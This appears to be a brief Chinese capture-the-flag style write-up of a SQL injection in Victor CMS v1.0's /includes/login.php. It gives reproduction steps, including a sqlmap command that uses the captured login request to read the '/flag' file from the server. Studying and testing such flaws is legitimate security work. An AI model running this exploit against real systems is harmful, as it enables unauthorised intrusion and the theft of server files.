一、漏洞概述
Victor CMS v1.0 /includes/login.php 存在sql注入
二、影响范围
Victor CMS v1.0
三、访问页面
四、漏洞复现
1、输入任意账号密码,点击登录,抓包。
2、复制登录请求包到1.txt文件,放到sqlmap目录下。
python sqlmap.py -r 1.txt --file-read "/flag" --dbms mysql --batch
//-file-read "/flag" 可以直接在数据库里找到相关的内容并保存到本地计算机。
3、打开本地文件,获取flag